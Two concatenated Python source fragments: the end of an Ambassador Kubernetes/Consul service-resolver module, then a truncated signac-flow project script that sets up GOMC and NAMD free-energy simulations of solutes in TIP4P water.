hrtype = 'Kubernetes' if (self.resolve_with == 'k8s') else self.resolve_with
# This is ugly. We're almost certainly being called from _within_ the initialization
# of the cluster here -- so I guess we'll report the error against the service. Sigh.
self.ir.aconf.post_error(f'Service {service.name}: {key}:{port} matches no endpoints from {hrtype}',
resource=service)
return None
class IRServiceResolverFactory:
@classmethod
def load_all(cls, ir: 'IR', aconf: Config) -> None:
config_info = aconf.get_config('resolvers')
if config_info:
assert(len(config_info) > 0) # really rank paranoia on my part...
for config in config_info.values():
cdict = config.as_dict()
cdict['rkey'] = config.rkey
cdict['location'] = config.location
ir.add_resolver(IRServiceResolver(ir, aconf, **cdict))
if not ir.get_resolver('kubernetes-service'):
# Default the K8s service resolver.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'KubernetesServiceResolver',
'name': 'kubernetes-service'
}
if Config.single_namespace:
resolver_config['namespace'] = Config.ambassador_namespace
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
# Ugh, the aliasing for the K8s and Consul endpoint resolvers is annoying.
res_e = ir.get_resolver('endpoint')
res_k_e = ir.get_resolver('kubernetes-endpoint')
if not res_e and not res_k_e:
# Neither exists. Create them from scratch.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'KubernetesEndpointResolver',
'name': 'kubernetes-endpoint'
}
if Config.single_namespace:
resolver_config['namespace'] = Config.ambassador_namespace
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
resolver_config['name'] = 'endpoint'
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
else:
cls.check_aliases(ir, aconf, 'endpoint', res_e, 'kubernetes-endpoint', res_k_e)
res_c = ir.get_resolver('consul')
res_c_e = ir.get_resolver('consul-endpoint')
if not res_c and not res_c_e:
# Neither exists. Create them from scratch.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'ConsulResolver',
'name': 'consul-endpoint',
'datacenter': 'dc1'
}
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
resolver_config['name'] = 'consul'
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
else:
cls.check_aliases(ir, aconf, 'consul', res_c, 'consul-endpoint', res_c_e)
@classmethod
def check_aliases(cls, ir: 'IR', aconf: Config,
n1: str, r1: Optional[IRServiceResolver],
n2: str, r2: Optional[IRServiceResolver]) -> None:
source = None
name = None
if not r1:
# r2 must exist to be here.
source = r2
name = n1
elif not r2:
# r1 must exist to be here.
source = r1
name = n2
if source:
config = dict(**source.as_dict())
# Fix up this dict. Sigh.
config['rkey'] = config.pop('_rkey', config.get('rkey', None)) # Kludge, I know...
config.pop('_errored', None)
config.pop('_active', None)
config.pop('resolve_with', None)
config['name'] = name
ir.add_resolver(IRServiceResolver(ir, aconf, **config))
|
"""GOMC's setup for signac, signac-flow, signac-dashboard for this study."""
# project.py
import flow
# from flow.environment import StandardEnvironment
import mbuild as mb
import mbuild.formats.charmm_writer as mf_charmm
import mbuild.formats.gomc_conf_writer as gomc_control
import numpy as np
from alchemlyb.parsing.gomc import extract_dHdl, extract_u_nk
from alchemlyb.estimators import MBAR, BAR, TI
import alchemlyb.preprocessing.subsampling as ss
import pandas as pd
import numpy as np
import os
import unyt as u
from flow import FlowProject, aggregator
from flow.environment import DefaultSlurmEnvironment
from src.utils.forcefields import get_ff_path
from src.utils.forcefields import get_molecule_path
from templates.NAMD_conf_template import generate_namd_equilb_control_file
class Project(FlowProject):
"""Subclass of FlowProject to provide custom methods and attributes."""
def __init__(self):
super().__init__()
class Grid(DefaultSlurmEnvironment): # Grid(StandardEnvironment):
"""Subclass of DefaultSlurmEnvironment for WSU's Grid cluster."""
hostname_pattern = r".*\.grid\.wayne\.edu"
template = "grid.sh"
# ******************************************************
# users typical variables, but not all (start)
# ******************************************************
# set binary path to gomc binary files (the bin folder).
# If the gomc binary files are callable directly from the terminal without a path,
# please just enter and empty string (i.e., "" or '')
# WSU grid binary paths
gomc_binary_path = "/wsu/home/go/go24/go2432/wolf/GOMC/bin"
namd_binary_path = "/wsu/home/go/go24/go2432/NAMD_2.14_Linux-x86_64-multicore-CUDA"
# brads workstation binary paths
#gomc_binary_path = "/home/brad/Programs/GOMC/GOMC_dev_1_21_22/bin"
#namd_binary_path = "/home/brad/Programs/NAMD/NAMD_2.14_RTX_3080_build_Source_CUDA"
# number of simulation steps
gomc_steps_equilb_design_ensemble = 10 * 10**6 # set value for paper = 10 * 10**6
gomc_steps_lamda_production = 50 * 10**6 # set value for paper = 50 * 10**6
gomc_output_data_every_X_steps = 100 * 10**3 # set value for paper = 100 * 10**3
gomc_free_energy_output_data_every_X_steps = 10 * 10**3 # set value for paper = 10 * 10**3
# Free energy calcs: set free energy data in doc
# this number will generate the lamdas
# set the number of lambda spacings, which includes 0 to 1
number_of_lambda_spacing_including_zero_int = 11
# force field (FF) file for all simulations in that job
# Note: do not add extensions
namd_ff_filename_str = "in_namd_FF"
gomc_ff_filename_str = "in_gomc_FF"
# initial mosdef structure and coordinates
# Note: do not add extensions
mosdef_structure_box_0_name_str = "mosdef_box_0"
# melt equilb simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
namd_equilb_NPT_control_file_name_str = "namd_equilb_NPT"
# The equilb using the ensemble used for the simulation design, which
# includes the simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
gomc_equilb_design_ensemble_control_file_name_str = "gomc_equilb_design_ensemble"
# The production run using the ensemble used for the simulation design, which
# includes the simulation runs GOMC control file input and simulation outputs
# Note: do not add extensions
gomc_production_control_file_name_str = "gomc_production_run"
# Analysis (each replicates averages):
# Output text (txt) file names for each replicates averages
# directly put in each replicate folder (.txt, .dat, etc)
output_replicate_txt_file_name_box_0 = "analysis_avg_data_box_0.txt"
# Analysis (averages and std. devs. of # all the replcates):
# Output text (txt) file names for the averages and std. devs. of all the replcates,
# including the extention (.txt, .dat, etc)
output_avg_std_of_replicates_txt_file_name_box_0 = "analysis_avg_std_of_replicates_box_0.txt"
walltime_mosdef_hr = 24
walltime_namd_hr = 24
walltime_gomc_equilbrium_hr = 72
walltime_gomc_production_hr = 368
walltime_gomc_analysis_hr = 4
memory_needed = 16
# forcefield names dict
forcefield_residue_to_ff_filename_dict = {
"TIP4": "tip4p_2005.xml",
"Ne": "nobel_gas_vrabec_LB_mixing.xml",
"Rn": "nobel_gas_vrabec_LB_mixing.xml",
"ETOH": "trappe-ua.xml",
}
# smiles of mol2 file input a .mol2 file or smiles as a string
smiles_or_mol2_name_to_value_dict = {
"TIP4": 'tip4p.mol2',
"Ne": "Ne",
"Rn": "Rn",
"ETOH": "ethanol.mol2"
}
# get the paths to the smiles or mol2 files
smiles_or_mol2 = {}
for smiles_or_mol2_iter_i in list(smiles_or_mol2_name_to_value_dict.keys()):
smiles_or_mol2.update(
{str(smiles_or_mol2_iter_i):
{"use_smiles": get_molecule_path(
str(smiles_or_mol2_name_to_value_dict[str(smiles_or_mol2_iter_i)]))[0],
"smiles_or_mol2": get_molecule_path(
str(smiles_or_mol2_name_to_value_dict[str(smiles_or_mol2_iter_i)]))[1],
}
}
)
# get the paths to the FF xmls
forcefield_dict = {}
for forcefield_dict_iter_i in list(forcefield_residue_to_ff_filename_dict.keys()):
forcefield_dict.update(
{str(forcefield_dict_iter_i): get_ff_path(
forcefield_residue_to_ff_filename_dict[str(forcefield_dict_iter_i)])
}
)
print("*********************")
print("*********************")
print("smiles_or_mol2 = " +str(smiles_or_mol2))
print("forcefield_dict = " +str(forcefield_dict))
print("*********************")
print("*********************")
# ******************************************************
# users typical variables, but not all (end)
# ******************************************************
# ******************************************************
# signac and GOMC-MOSDEF code (start)
# ******************************************************
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (start).
# ******************************************************
# ******************************************************
# set the default directory
project_directory_path = str(os.getcwd())
print("project_directory_path = " +str(project_directory_path))
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (start)
# ******************************************************
# ******************************************************
def statepoint_without_replica(job):
keys = sorted(tuple(i for i in job.sp.keys() if i not in {"replica_number_int"}))
return [(key, job.sp[key]) for key in keys]
def statepoint_without_temperature(job):
keys = sorted(tuple(i for i in job.sp.keys() if i not in {"production_temperature_K"}))
return [(key, job.sp[key]) for key in keys]
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (start)
# ******************************************************
# ******************************************************
def get_delta_TI_or_MBAR(TI_or_MBAR_estimate, k_b_T):
""" Return the change in free energy and standard deviation for the MBAR and TI estimates.
"""
delta = TI_or_MBAR_estimate.delta_f_.iloc[0, -1] * k_b_T
std_delta = TI_or_MBAR_estimate.d_delta_f_.iloc[0, -1] * k_b_T
return delta, std_delta
def get_delta_BAR(BAR_estimate, k_b_T):
""" Return the change in free energy and standard deviation for the BAR estimates.
"""
error_estimate = 0.0
for i in range(len(BAR_estimate.d_delta_f_) - 1):
error_estimate += BAR_estimate.d_delta_f_.values[i][i + 1] ** 2
delta = BAR_estimate.delta_f_.iloc[0, -1] * k_b_T
std_delta = k_b_T * error_estimate ** 0.5
return delta, std_delta
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (end)
# ******************************************************
# ******************************************************
@Project.label
def part_1a_initial_data_input_to_json(job):
"""Check that the initial job data is written to the json files."""
data_written_bool = False
if job.isfile(f"{"signac_job_document.json"}"):
data_written_bool = True
return data_written_bool
@Project.post(part_1a_initial_data_input_to_json)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_mosdef_hr,
}
)
@flow.with_job
def initial_parameters(job):
"""Set the initial job parameters into the jobs doc json file."""
# select
# set free energy data in doc
# Free energy calcs
# lamda generator
LambdaVDW_list = []
InitialState_list = []
for lamda_i in range(0, int(number_of_lambda_spacing_including_zero_int)):
lambda_space_increments = 1 / int(number_of_lambda_spacing_including_zero_int - 1)
LambdaVDW_list.append(np.round(lamda_i * lambda_space_increments, decimals=8))
InitialState_list.append(lamda_i)
print("*********************")
print("*********************")
print("LambdaVDW_list = " + str(LambdaVDW_list))
print("InitialState_list = " + str(InitialState_list))
print("*********************")
print("*********************")
if LambdaVDW_list[0] != 0 and LambdaVDW_list[-1] != 1 :
raise ValueError("ERROR: The selected lambda list values do not start with a 0 and end 1.")
job.doc.LambdaVDW_list = LambdaVDW_list
job.doc.InitialState_list = InitialState_list
# set the GOMC production ensemble temp, pressure, molecule, box dimenstion and residue names
job.doc.production_ensemble = "NVT"
job.doc.production_pressure_bar = (1 * u.atm).to('bar')
job.doc.production_temperature_K = job.sp.production_temperature_K
job.doc.N_liquid_solvent = 1000
job.doc.N_liquid_solute = 1
job.doc.liq_box_lengths_ang = 31.07 * u.angstrom
job.doc.Rcut_ang = 15 * u.angstrom # this is the Rcut for GOMC it is the Rswitch for NAMD
job.doc.Rcut_for_switch_namd_ang = 17 * u.angstrom # Switch Rcut for NAMD's Switch function
job.doc.neighbor_list_dist_namd_ang = 22 * u.angstrom # NAMD's neighbor list
# list replica seed numbers
replica_no_to_seed_dict = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
8: 8,
9: 9,
10: 10,
11: 11,
12: 12,
13: 13,
14: 14,
15: 15,
16: 16,
17: 17,
18: 18,
19: 19,
20: 20,
}
job.doc.replica_number_int = replica_no_to_seed_dict.get(
int(job.sp.replica_number_int)
)
# set solvent and solute in doc
job.doc.solvent = "TIP4"
job.doc.solute = job.sp.solute
# set rcut, ewalds
if job.doc.solvent in ["TIP4", "TIP3"] and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
job.doc.namd_node_ncpu = 1
job.doc.namd_node_ngpu = 1
job.doc.gomc_ncpu = 1 # 1 is optimal but I want data quick. run time is set for 1 cpu
job.doc.gomc_ngpu = 1
else:
raise ValueError(
"ERROR: The solvent and solute do are not set up to selected the mixing rules or electrostatics "
)
# get the namd binary paths
if job.doc.namd_node_ngpu == 0:
job.doc.namd_cpu_or_gpu = "CPU"
elif job.doc.namd_node_ngpu == 1:
job.doc.namd_cpu_or_gpu = "GPU"
else:
raise ValueError(
"Tee NAMD CPU and GPU can not be determined as force field (FF) is not available in the selection, "
"or GPU selection is is not 0 or 1."
)
# get the gomc binary paths
if job.doc.gomc_ngpu == 0:
job.doc.gomc_cpu_or_gpu = "CPU"
elif job.doc.gomc_ngpu == 1:
job.doc.gomc_cpu_or_gpu = "GPU"
else:
raise ValueError(
"The GOMC CPU and GPU can not be determined as force field (FF) is not available in the selection, "
"or GPU selection is is not 0 or 1."
)
# set the initial iteration number of the simulation
job.doc.gomc_equilb_design_ensemble_dict = {}
job.doc.gomc_production_run_ensemble_dict = {}
if job.doc.production_ensemble == "NPT":
job.doc.namd_equilb_NPT_gomc_binary_file = f"namd2"
job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
elif job.doc.production_ensemble == "NVT":
job.doc.namd_equilb_NPT_gomc_binary_file = f"namd2"
job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NVT"
else:
raise ValueError(
"ERROR: The 'GCMC', 'GEMC_NVT', 'GEMC_NPT' ensembles is not currently available for this project.py "
)
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (end).
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and force field (FF) files were written (start)
# ******************************************************
# ******************************************************
# check if GOMC-MOSDEF wrote the gomc files
# @Project.pre(select_production_ensemble)
@Project.label
@flow.with_job
def mosdef_input_written(job):
"""Check that the mosdef files (psf, pdb, and force field (FF) files) are written ."""
file_written_bool = False
if (
job.isfile(f"{namd_ff_filename_str}.inp")
and job.isfile(f"{gomc_ff_filename_str}.inp")
and job.isfile(
f"{mosdef_structure_box_0_name_str}.psf"
)
and job.isfile(
f"{mosdef_structure_box_0_name_str}.pdb"
)
):
file_written_bool = True
return file_written_bool
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and FF files were written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC control file was written (start)
# ******************************************************
# ******************************************************
# function for checking if the GOMC control file is written
def gomc_control_file_written(job, control_filename_str):
"""General check that the gomc control files are written."""
file_written_bool = False
control_file = f"{control_filename_str}.conf"
if job.isfile(control_file):
with open(job.fn(f"{control_file}"), "r") as fp:
out_gomc = fp.readlines()
for i, line in enumerate(out_gomc):
if "OutputName" in line:
split_move_line = line.split()
if split_move_line[0] == "OutputName":
file_written_bool = True
return file_written_bool
# function for checking if the NAMD control file is written
def namd_control_file_written(job, control_filename_str):
"""General check that the NAMD control files are written."""
file_written_bool = False
control_file = f"{control_filename_str}.conf"
if job.isfile(control_file):
with open(job.fn(f"{control_file}"), "r") as fp:
out_namd = fp.readlines()
for i, line in enumerate(out_namd):
if "cellBasisVector1" in line:
split_move_line = line.split()
if split_move_line[0] == "cellBasisVector1":
file_written_bool = True
return file_written_bool
# checking if the NAMD control file is written for the melt equilb NVT run
@Project.label
@flow.with_job
def part_2a_namd_equilb_NPT_control_file_written(job):
"""General check that the namd_equilb_NPT_control_file
(high temperature to set temp NAMD control file) is written."""
return namd_control_file_written(job, namd_equilb_NPT_control_file_name_str)
# checking if the GOMC control file is written for the equilb run with the selected ensemble
@Project.label
@flow.with_job
def part_2b_gomc_equilb_design_ensemble_control_file_written(job):
"""General check that the gomc_equilb_design_ensemble (run temperature) gomc control file is written."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
gomc_control_file_written(
job,
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
except:
return False
return True
except:
return False
# checking if the GOMC control file is written for the production run
@Project.label
@flow.with_job
def part_2c_gomc_production_control_file_written(job):
"""General check that the gomc_production_control_file (run temperature) is written."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
return gomc_control_file_written(
job,
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC control file was written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC simulations started (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are started
def gomc_simulation_started(job, control_filename_str):
"""General check to see if the gomc simulation is started."""
output_started_bool = False
if job.isfile("out_{}.dat".format(control_filename_str)) and job.isfile(
"{}_merged.psf".format(control_filename_str)
):
output_started_bool = True
return output_started_bool
# function for checking if NAMD simulations are started
def namd_simulation_started(job, control_filename_str):
"""General check to see if the namd simulation is started."""
output_started_bool = False
if job.isfile("out_{}.dat".format(control_filename_str)) and job.isfile(
"{}.restart.xsc".format(control_filename_str)
):
output_started_bool = True
return output_started_bool
# check if melt equilb_NVT namd run is started
@Project.label
@flow.with_job
def part_3a_output_namd_equilb_NPT_started(job):
"""Check to see if the namd_equilb_NPT_control_file is started
(high temperature to set temperature in NAMD control file)."""
return namd_simulation_started(job, namd_equilb_NPT_control_file_name_str)
# check if equilb_with design ensemble GOMC run is started
@Project.label
@flow.with_job
def part_3b_output_gomc_equilb_design_ensemble_started(job):
"""Check to see if the gomc_equilb_design_ensemble simulation is started (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
if job.isfile(
"out_{}.dat".format(
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
)
):
gomc_simulation_started(
job,
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
else:
return False
except:
return False
return True
except:
return False
# check if production GOMC run is started by seeing if the GOMC consol file and the merged psf exist
@Project.label
@flow.with_job
def part_part_3c_output_gomc_production_run_started(job):
"""Check to see if the gomc production run simulation is started (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
if job.isfile(
"out_{}.dat".format(
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
)
):
gomc_simulation_started(
job,
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
else:
return False
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC simulations started (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are completed properly
def gomc_sim_completed_properly(job, control_filename_str):
"""General check to see if the gomc simulation was completed properly."""
job_run_properly_bool = False
output_log_file = "out_{}.dat".format(control_filename_str)
if job.isfile(output_log_file):
with open(job.fn(f"{output_log_file}"), "r") as fp:
out_gomc = fp.readlines()
for i, line in enumerate(out_gomc):
if "Move" in line:
split_move_line = line.split()
if (
split_move_line[0] == "Move"
and split_move_line[1] == "Type"
and split_move_line[2] == "Mol."
and split_move_line[3] == "Kind"
):
job_run_properly_bool = True
else:
job_run_properly_bool = False
return job_run_properly_bool
# function for checking if NAMD simulations are completed properly
def namd_sim_completed_properly(job, control_filename_str):
"""General check to see if the namd simulation was completed properly."""
job_run_properly_bool = False
output_log_file = "out_{}.dat".format(control_filename_str)
if job.isfile(output_log_file):
with open(job.fn(f"{output_log_file}"), "r") as fp:
out_namd = fp.readlines()
for i, line in enumerate(out_namd):
if "WallClock:" in line:
split_move_line = line.split()
if (split_move_line[0] == "WallClock:"
and split_move_line[2] == "CPUTime:"
and split_move_line[4] == "Memory:"
):
job_run_properly_bool = True
else:
job_run_properly_bool = False
return job_run_properly_bool
# check if melt equilb NVT GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4a_job_namd_equilb_NPT_completed_properly(job):
"""Check to see if the namd_equilb_NPT_control_file was completed properly
(high temperature to set temperature NAMD control file)."""
x = namd_sim_completed_properly(
job, namd_equilb_NPT_control_file_name_str
)
#print(f'namd check = {x}')
return namd_sim_completed_properly(
job, namd_equilb_NPT_control_file_name_str
)
# check if equilb selected ensemble GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4b_job_gomc_equilb_design_ensemble_completed_properly(job):
"""Check to see if the gomc_equilb_design_ensemble simulation was completed properly (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
filename_4b_iter = job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
if gomc_sim_completed_properly(
job,
filename_4b_iter,
) is False:
print("gomc_equilb_design_ensemble incomplete state " + str(initial_state_i))
return False
except:
return False
return True
except:
return False
# check if production GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4c_job_production_run_completed_properly(job):
"""Check to see if the gomc production run simulation was completed properly (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
filename_4c_iter = job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
if gomc_sim_completed_properly(
job,
filename_4c_iter,
) is False:
print("Isn't finished ",filename_4c_iter)
return False
# check specifically for the FE files
if job.isfile(f'Free_Energy_BOX_0_{filename_4c_iter}.dat') is False:
print("Isn't finished ",f'Free_Energy_BOX_0_{filename_4c_iter}.dat')
return False
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (start)
# ******************************************************
# ******************************************************
# check if analysis is done for the individual replicates wrote the gomc files
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.label
@flow.with_job
def part_5a_analysis_individual_simulation_averages_completed(job):
"""Check that the individual simulation averages files are written ."""
file_written_bool = False
if (
job.isfile(
f"{output_replicate_txt_file_name_box_0}"
)
):
file_written_bool = True
return file_written_bool
# check if analysis for averages of all the replicates is completed
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.label
def part_5b_analysis_replica_averages_completed(*jobs):
"""Check that the simulation replicate average and std. dev. files are written."""
file_written_bool_list = []
all_file_written_bool_pass = False
for job in jobs:
file_written_bool = False
if (
job.isfile(
f"../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}"
)
):
file_written_bool = True
file_written_bool_list.append(file_written_bool)
if False not in file_written_bool_list:
all_file_written_bool_pass = True
return all_file_written_bool_pass
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# build system, with option to write the force field (force field (FF)), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (start)
# ******************************************************
# build system
def build_charmm(job, write_files=True):
"""Build the Charmm object and potentially write the pdb, psd, and force field (FF) files."""
print("#**********************")
print("Started: GOMC Charmm Object")
print("#**********************")
mbuild_box_seed_no = job.doc.replica_number_int
solvent = mb.load(smiles_or_mol2[job.doc.solvent]['smiles_or_mol2'],
smiles=smiles_or_mol2[job.doc.solvent]['use_smiles']
)
solvent.name = job.doc.solvent
if job.doc.solvent not in ["TIP4"]:
solvent.energy_minimize(forcefield=forcefield_dict[job.doc.solvent], steps=10 ** 5)
if job.sp.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn"]:
solute = mb.Compound(name=job.doc.solute)
else:
solute = mb.load(smiles_or_mol2[job.sp.solute]['smiles_or_mol2'],
smiles=smiles_or_mol2[job.sp.solute]['use_smiles']
)
solute.name = job.sp.solute
# only put the FF molecules in the simulation in the dictionaly input into the Chamm object.
minimal_forcefield_dict = {solute.name: forcefield_dict[solute.name],
solvent.name: forcefield_dict[solvent.name]
}
solute.energy_minimize(forcefield=forcefield_dict[job.sp.solute], steps=10 ** 5)
bead_to_atom_name_dict = {
"_LP": "LP",
}
residues_list = [solute.name, solvent.name]
print("residues_list = " +str(residues_list ))
if job.doc.solvent in ["TIP4", "TIP3"]:
gomc_fix_bonds_angles_residues_list = [solvent.name]
else:
gomc_fix_bonds_angles_residues_list = None
print('Running: filling liquid box')
box_0 = mb.fill_box(compound=[solute, solvent],
n_compounds=[job.doc.N_liquid_solute, job.doc.N_liquid_solvent],
box=[u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
],
seed=mbuild_box_seed_no
)
print('Completed: filling liquid box')
print('Running: GOMC FF file, and the psf and pdb files')
if job.doc.production_ensemble in ["NVT", "NPT"]:
print('Running: namd_charmm')
namd_charmm = mf_charmm.Charmm(
box_0,
mosdef_structure_box_0_name_str,
structure_box_1=None,
filename_box_1=None,
ff_filename= namd_ff_filename_str,
forcefield_selection=minimal_forcefield_dict,
residues=residues_list,
bead_to_atom_name_dict=bead_to_atom_name_dict,
gomc_fix_bonds_angles=None,
)
print('Running: gomc_charmm')
gomc_charmm = mf_charmm.Charmm(
box_0,
mosdef_structure_box_0_name_str,
structure_box_1=None,
filename_box_1=None,
ff_filename= gomc_ff_filename_str,
forcefield_selection=minimal_forcefield_dict,
residues=residues_list,
bead_to_atom_name_dict=bead_to_atom_name_dict,
gomc_fix_bonds_angles=gomc_fix_bonds_angles_residues_list,
)
else:
raise ValueError("ERROR: The GCMC and GEMC ensembles are not supported in this script.")
if write_files == True:
gomc_charmm.write_inp()
namd_charmm.write_inp()
namd_charmm.write_psf()
namd_charmm.write_pdb()
print("#**********************")
print("Completed: GOMC Charmm Object")
print("#**********************")
return [namd_charmm, gomc_charmm]
# ******************************************************
# ******************************************************
# build system, with option to write the force field (FF), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (start)
# ******************************************************
# ******************************************************
@Project.pre(part_1a_initial_data_input_to_json)
@Project.post(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_2b_gomc_equilb_design_ensemble_control_file_written)
@Project.post(part_2c_gomc_production_control_file_written)
@Project.post(mosdef_input_written)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_mosdef_hr,
}
)
@flow.with_job
def build_psf_pdb_ff_gomc_conf(job):
"""Build the Charmm object and write the pdb, psd, and force field (FF)
files for all the simulations in the workspace."""
[namd_charmm_object_with_files, gomc_charmm_object_with_files] = build_charmm(job, write_files=True)
FreeEnergyCalc = [True, int(gomc_free_energy_output_data_every_X_steps)]
MoleculeType = [job.sp.solute, 1]
use_ElectroStatics = True
VDWGeometricSigma = False
Exclude = "1-4"
# common variables
cutoff_style = "VDW"
if cutoff_style != "VDW":
raise ValueError("ERROR: this project is only set up for the SWITCH cutoff style for NAMD"
"and VDW for GOMC. Therefore, the cutoff style selected must be VDW. "
"Rswitch for namd only so the r_switch_dist_start and "
"r_switch_dist_end must be supplied for NAMD. GOMC will then move to VDW "
"with the switch dist (r_switch_dist_start) as the cutoff with LRC.")
production_temperature_K = (job.sp.production_temperature_K * u.K).to_value("K")
production_pressure_bar = (job.doc.production_pressure_bar * u.bar).to_value("bar")
box_lengths_ang = [u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
]
seed_no = job.doc.replica_number_int
namd_template_path_str = os.path.join(project_directory_path, "templates/NAMD_conf_template.conf")
if job.doc.solvent in ["TIP3"] or job.sp.solute in ["TIP3"]:
namd_uses_water = True
namd_water_model = 'tip3'
elif job.doc.solvent in ["TIP4"] or job.sp.solute in ["TIP4"]:
namd_uses_water = True
namd_water_model = 'tip4'
else:
namd_uses_water = False
namd_water_model= None
# generate the namd file
# NOTE: the production and melt temps are converted to intergers so they can be ramped down
# from hot to cool to equilibrate the system.
generate_namd_equilb_control_file(template_path_filename=namd_template_path_str,
namd_path_conf_filename=namd_equilb_NPT_control_file_name_str,
namd_path_file_output_names=namd_equilb_NPT_control_file_name_str,
namd_uses_water=namd_uses_water,
namd_water_model=namd_water_model,
namd_electrostatics_bool=use_ElectroStatics,
namd_vdw_geometric_sigma_bool=VDWGeometricSigma,
namd_psf_path_filename=f"{mosdef_structure_box_0_name_str}.psf",
namd_pdb_path_filename=f"{mosdef_structure_box_0_name_str}.pdb",
namd_ff_path_filename=f"{namd_ff_filename_str}.inp",
namd_production_temp_K= int(production_temperature_K),
namd_production_pressure_bar=production_pressure_bar,
electrostatic_1_4=namd_charmm_object_with_files.coul_1_4,
non_bonded_cutoff=job.doc.Rcut_for_switch_namd_ang,
non_bonded_switch_distance=job.doc.Rcut_ang,
pairlist_distance=job.doc.neighbor_list_dist_namd_ang,
box_lengths=box_lengths_ang,
)
print("#**********************")
print("Completed: namd_equilb_NPT GOMC control file writing")
print("#**********************")
# ******************************************************
# namd_equilb_NPT - psf, pdb, force field (FF) file writing and GOMC control file writing (end)
# ******************************************************
# ******************************************************
# equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (start)
# Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
# so the Charmm object only needs created 1 time.
# ******************************************************
print("#**********************")
